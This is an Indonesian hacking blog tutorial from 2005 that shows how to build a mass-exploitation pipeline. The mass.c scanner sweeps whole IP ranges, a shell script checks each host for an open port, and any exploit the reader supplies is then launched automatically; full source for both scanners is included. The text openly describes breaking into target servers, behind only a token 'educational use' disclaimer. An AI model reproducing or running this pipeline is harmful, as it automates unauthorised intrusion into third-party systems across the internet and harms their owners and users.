Jumat, Februari 25, 2005

scanner hacking gabungan

/*********************************************************
* Mass Scanner menggunakan gabungan
* beberapa tool dan satu exploit
*
* oleh : iko (iko94@yahoo.com)
* release : dec,15,200*
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/

Masih ingat dengan artikel berjudul "Menggunakan Mass Scanner Dengan Telnet
Fingerprint Metode Shell Scripting" (milik mas scut di indohack.sf.net) ?
Artikel tersebut menerangkan tentang bagaimana cara mencoba satu exploit ke banyak
target sasaran yang berupa daftar di satu file. Mass Scanner Telnet Fingerprint itu
mempunyai satu kelemahan yaitu kita harus sudah membuat satu daftar nomor ip yang
akan di-scan.
Nah, bagaimana caranya agar kita tinggal mengetikkan satu baris perintah saja dan
semuanya akan berjalan dengan sendirinya ?
Berikut ini akan penulis jelaskan caranya, beserta tools yang diperlukan.
Tools:
1. mass.c (dicomot dari massplo.tar.gz milik mas slamet, source code di bawah)
2. mig-port-scan.c (milik no1 => greyhats.za.net , source code ada di bawah)
3. sebuah script sederhana (try.sh)
4. sebuah file log temporer
5. sebuah exploit
6. banyak kesabaran :)
Pertama-tama tentukan satu exploit yang akan dipakai (contoh : explo.c), kemudian
compile file tersebut (catatan : anda harus memahami betul bagaimana cara kerja
exploit tersebut). Langkah ke dua, compile file mig-port-scan.c . Langkah ke tiga,
buatlah satu script sederhana, yang akan kita gunakan untuk melakukan pengecekan
server target mana yang mempunyai port yang terbuka sesuai dengan kebutuhan exploit
kita, jika benar terbuka, maka exploit akan dijalankan dan melakukan penetrasi ke
server target.
Contoh script sederhana ini :
-----------try.sh start here--------------
#!/bin/sh
#
./mig-port-scan -h $1 -p port_yg_discan -o log_temporer
sleep 1
cat log_temporer
CEK="`cat log_temporer | awk '{print $2}'`"
if [ "$CEK" = "Open" ]; then
echo "OK server $1 terbuka, kita coba..."
./exploit -t $1
fi
echo "kita coba yang lain..... :("
-----------try.sh end here-----------------
Simpan dan chmod +x try.sh ini.
Perhatikan bahwa argumen $1 di atas mewakili nomor ip target kita, sedang sleep 1
detik digunakan untuk menanti konek back dari mig-port-scan (yaitu hasil scan).
Perhatikan juga tanda baca backquote (jangan sampai salah lho !) di variable CEK.
Anda juga harus mengganti baris ./exploit -t $1 , dengan perintah untuk menjalankan
exploit anda (dengan segala argumen-nya tentu!).
Ada dua keuntungan pemakaian try.sh ini, yaitu jika terjadi kondisi :
1. ketika exploit kita mandeg di tengah jalan (seperti stagnant/nyantol);
2. ketika kita sudah berhasil masuk ke suatu server target, dan kita ingin
meneruskan proses scanning kita;
maka kita tinggal memencet tombol control+c, dan proses pun akan terus berjalan,
karena yang ditutup adalah program script ini dan bukan program mass.
Nah, kita tinggal mengedit program utama, yaitu mass.c
Perhatikan source mass.c di baris perintah berikut:
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
nah di situlah letak script kita tadi, baris tersebut menjalankan script kita
dengan cara memberikannya ke variabel luck (lihat baris system(luck);). Masih
tertarik ? Makanya segera belajarlah bahasa pemrograman !!!
Langkah terakhir, kita harus mengkompile mass.c agar bisa kita jalankan.
#gcc mass.c -o massexploit -Wall
lalu jalankan mass scanner kita :
#./massexploit
ikuti petunjuknya !
Selamat mencoba !!!

Berikut ini source code mass.c:
-----------------mass.c begin here-------------------------
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_SOCKETS 500
#define TIMEOUT 5

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS];

void init_sockets(void);
void check_sockets(void);
void fatal(char *);

int main(int argc, char *argv[])
{
int done, i, aa, bb, cc, dd, ret, k, ns;
unsigned int port;
time_t scantime;
char ip[20];

if (argc < 3) {
printf("Usage: %s [b-block] [c-block]\n", argv[0]);
return -1;
}

done = 0; bb = 0; cc = 0; dd = 0; aa = 0; port = 0;

aa = atoi(argv[1]);
if ((aa < 0) || (aa > 255)) {
fatal("Invalid a-range\n");
}

port = (unsigned int)atoi(argv[2]);
if (port == 0)
fatal("Bad port number.\n");

if (argc >= 4) {
bb = atoi(argv[3]);
if ((bb < 0) || (bb > 255))
fatal("Invalid b-range.\n");
}

if (argc >= 5) {
cc = atoi(argv[4]);
if ((cc < 0) || (cc > 255))
fatal("Invalid c-range.\n");
}

init_sockets();

scantime = time(0);

while(!done) {
for (i = 0; i < MAX_SOCKETS; i++) {
if (dd == 255) {
if (cc < 255) {
cc++;
dd = 0;
}
else {
if (bb < 255) {
bb++;
cc = 0;
dd = 0;
}
else {
if (aa < 255) {
aa++;
bb = 0;
cc = 0;
dd = 0;
}
else {
ns = 0;
for (k = 0; k < MAX_SOCKETS; k++) {
if (connlist[k].status > S_NONE)
ns++;
}

if (ns == 0)
break;
}

}
}
}

if (connlist[i].status == S_NONE) {
connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
if (connlist[i].s != -1) {
ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
if (ret == -1) {
printf("Unable to set O_NONBLOCK\n");
close(connlist[i].s);
}
else {
memset((char *)ip, 0, 20);
sprintf(ip, "%d.%d.%d.%d", aa, bb, cc, dd);
connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
if (connlist[i].addr.sin_addr.s_addr == -1)
fatal("Invalid IP.");
connlist[i].addr.sin_family = AF_INET;
connlist[i].addr.sin_port = htons(port);
connlist[i].a = time(0);
connlist[i].status = S_CONNECTING;
dd++;
}
}
}
}

check_sockets();
}

}

void init_sockets(void)
{
int i;

for (i = 0; i < MAX_SOCKETS; i++) {
connlist[i].status = S_NONE;
memset((struct sockaddr_in *)&connlist[i].addr, 0,
sizeof(struct sockaddr_in));
}
}

void check_sockets(void)
{
int i, ret;

for (i = 0; i < MAX_SOCKETS; i++) {
if ((connlist[i].a < (time(0) - TIMEOUT)) &&
(connlist[i].status == S_CONNECTING)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}

else if (connlist[i].status == S_CONNECTING) {
ret = connect(connlist[i].s,
(struct sockaddr *)&connlist[i].addr,
sizeof(struct sockaddr_in));
if (ret == -1) {
if (errno == EISCONN) {
printf("%s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
close(connlist[i].s);
connlist[i].status = S_NONE;
}

if ((errno != EALREADY) && (errno != EINPROGRESS)) {
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
else {
char luck[100];
sprintf(luck,"./try.sh %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
printf("Sodok ip %s\n",
(char *)inet_ntoa(connlist[i].addr.sin_addr),
(time(0)-connlist[i].a));
system(luck);
printf("Wuasuu, cuk...\n");
close(connlist[i].s);
connlist[i].status = S_NONE;
}
}
}
}

void fatal(char *err)
{
int i;
printf("Error: %s\n", err);
for (i = 0; i < MAX_SOCKETS; i++) {
if (connlist[i].status >= S_CONNECTING)
close(connlist[i].s);
}
exit(-1);
}
---------------mass.c end here--------------------------------------

Berikut source code mig-port-scan.c
---------------mig-port-scan.c start here---------------------------
/****************
name : mig-port-scan.c

version : 1.0

creation date : 15th of October 2002

author : no1 ( greyhats.za.net )

description : veeery fast connect() port scanner
with multi-host scanning support

usage : gcc mig-port-scan.c -o mig-port-scan -Wall
./mig-port-scan

extra : nmap is just too slow for simple connect()
scans of big IP lists thats why i coded this.
if you have any comments or suggestions, mail
me at no1@greyhats.za.net or msg me at
http://greyhats.za.net/guestbook/
****************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v);
int get_port(char *ports, char *backup);
int Connect(int fd, char *ip, int port, int time_out, int debug);
int usage(char *arg);
long hosts_scanned = 0;
long ports_scanned = 12;
int main(int argc, char **argv)
{
int TIMEOUT = 3;
int CHILDREN = 50;
int PORT = 0;
int DEBUG = 0;
int i = 0;
int p = 0;
int log_check = 0;
int flag = 0;
int status;
int verbose = 0;
FILE *fp;
FILE *ld;
char IP[16] = "127.0.0.1";
char INPUT[256] = "./input318";
char OUTPUT[256] = "./log";
char PORTS[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char PORTS_BACKUP[256] = "21,22,23,25,53,80,110,111,113,119,143,515,:";
char *P_PORTS;
char *P_PORTS_BACKUP;
char opt;
P_PORTS = PORTS;
P_PORTS_BACKUP = PORTS_BACKUP;
while((opt = getopt(argc, argv, "h:i:p:o:c:t:vd")) != -1)
{
switch (opt)
{
case 'h':// ip
{
flag++;
bzero(IP, sizeof(IP));
strcpy(IP, optarg);
remove("./input318");
fp = fopen(INPUT, "w");
fprintf(fp, "%s\n", IP);
fclose(fp);
fp = fopen(INPUT, "r");
break;
}
case 'i':// file with ips
{
flag++;
bzero(INPUT, sizeof(INPUT));
strcpy(INPUT, optarg);
fp = fopen(INPUT, "r");
break;
}
case 'p':// ports in 21,22,23 format
{
bzero(PORTS, sizeof(PORTS));
bzero(PORTS_BACKUP, sizeof(PORTS_BACKUP));
strcpy(PORTS, optarg);
strcpy(PORTS_BACKUP, optarg);
strcat(PORTS, ",:");
strcat(PORTS_BACKUP, ",:");
puts("TEST");
ports_scanned = 0;
for(; PORTS[p] != 0; p++)
{
if(PORTS[p] == 44)
ports_scanned++;
}
break;
}
case 'o':// log file (stdout if not used)
{
log_check = 1;
strcpy(OUTPUT, optarg);
ld = fopen(OUTPUT, "w");
break;
}
case 'c':// number of children
{
CHILDREN = atoi(optarg);
break;
}
case 't':// timeout value for connect/read/write
{
TIMEOUT = atoi(optarg);
break;
}
case 'v':// verbose mode
{
verbose++;
break;
}
case 'd':// debuging output
{
DEBUG = 1;
break;
}
}
}
if((flag == 2) || (flag == 0))
{
usage(argv[0]);
exit(1);
}
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
hosts_scanned++;
}
fclose(fp);
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n\n");
printf("Hosts being scanned: %ld\n", hosts_scanned);
printf("Ports being scanned: %ld\n\n", ports_scanned);
bzero(IP, sizeof(IP));
fp = fopen(INPUT, "r");
while((fgets(IP, sizeof(IP), fp)) != NULL)
{
IP[strlen(IP) - 1] = '\0';
for(; (PORT = get_port(P_PORTS, P_PORTS_BACKUP)) != 0; i++)
{
switch (fork())
{
case 0:
{
scan(IP, PORT, TIMEOUT, DEBUG, &ld, log_check, verbose);
_exit(0);
break;
}
case -1:
{
perror("fork error");
_exit(0);
break;
}
default:
{
if(i > CHILDREN - 2)
{
wait(&status);
i--;
}
break;
}
}
}
bzero(IP, sizeof(IP));
}
remove("./input318");
fclose(fp);
return 0;
}
int scan(char *ip, int port, int time_out, int debug, FILE ** log, int logcheck, int v)
{
FILE *logs = *log;
int sockfd;
int stat;
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket() error\n", ip, port);
return (-1);
}
stat = Connect(sockfd, ip, port, time_out, debug);
if(stat == -1)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
if(stat == -2)
{
if(logcheck == 1)
{
if(v == 1)
fprintf(logs, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
if(v == 1)
fprintf(stdout, "[%s][%d] Closed (could be firewall)\n", ip, port);
fflush(stdout);
close(sockfd);
}
return (-1);
}
else
{
if(logcheck == 1)
{
fprintf(logs, "[%s][%d] Open\n", ip, port);
fflush(logs);
close(sockfd);
}
else
{
fprintf(stdout, "[%s][%d] Open\n", ip, port);
fflush(stdout);
close(sockfd);
}
}
return (0);
}
int get_port(char *ports, char *backup)
{
int i;
int x;
int z;
char port[5];
char tmp[256];
bzero(port, sizeof(port));
bzero(tmp, sizeof(tmp));
strcpy(tmp, ports);
for(i = 0; ports[i] != ','; i++)
{
if(ports[i] == ':')
{
strcpy(ports, backup);
return 0;
}
port[i] = ports[i];
}
port[strlen(port)] = '\0';
for(z = strlen(port) + 1, x = 0; z < strlen(ports); z++)
{
ports[x++] = tmp[z];
}
ports[x] = '\0';
return atoi(port);
}
int Connect(int fd, char *ip, int port, int time_out, int debug)
{
int flags;
int select_status;
fd_set connect_read, connect_write;
struct timeval timeout;
int getsockopt_length = 0;
int getsockopt_error = 0;
struct sockaddr_in server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);
if((flags = fcntl(fd, F_GETFL, 0)) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error getting socket flags\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket non-blocking\n", ip, port);
close(fd);
return (-1);
}
timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);
if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0)
{
if(errno != EINPROGRESS)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() error\n", ip, port);
close(fd);
return (-1);
}
}
else
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);
if(select_status == 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> connect() timed out\n", ip, port);
close(fd);
return (-2);
}
if(select_status == -1)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> select() error on connect()\n", ip, port);
close(fd);
return (-1);
}
if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write))
{
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write))
{
getsockopt_length = sizeof(getsockopt_error);
if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0)
{
errno = ETIMEDOUT;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() timed out on connect()\n", ip, port);
close(fd);
return (-1);
}
if(getsockopt_error == 0)
{
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
else
{
errno = getsockopt_error;
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> getsockopt() error on connect()\n", ip, port);
close(fd);
return (-1);
}
}
}
else
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> socket not readable or writable\n", ip, port);
close(fd);
return (-1);
}
if(fcntl(fd, F_SETFL, flags) < 0)
{
if(debug == 1)
fprintf(stderr, "\n[%s][%d]-> fcntl() error setting socket flags to original state\n", ip, port);
close(fd);
return (-1);
}
return (1);
}
int usage(char *arg)
{
printf("\n [0;32m******************************** [0m\n");
printf(" [0;32m* MIG Port Scanner v1.0 by [0;31mno1 [0;32m* [0m\n");
printf(" [0;32m******************************** [0m\n");
printf("\n%s [[-h ] | [-i ]] [-o ] [-p <#>] [-c <#>] [-t <#>] [-v] [-d]\n", arg);
printf("\n [-h]\tsingle ip address to scan\n");
printf(" [-i]\tfile with ip addresses to scan\n");
printf(" [-o]\tlog file (defult: stdout)\n");
printf(" [-p]\tports seperated by commas\n");
printf("\t(default: 21,22,23,25,53,80,110,111,113,119,143,515)\n");
printf(" [-c]\tnumber of children to spawn (default: 50)\n");
printf(" [-t]\tconnect timeout value (default: 3)\n");
printf(" [-v]\tfor verbose output (default: off)\n");
printf(" [-d]\tfor debuging output (default: off)\n\n");
return 0;
}
/*******************/
// greyhats.za.net //
/*******************/

--------------mig-port-scan.c end here---------------------------

iko berterimakasih kepada:
[+] qq
[+] tiyok
[+] keputih group
[+] everyone who shouting the freedom

iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source

Tidak ada komentar: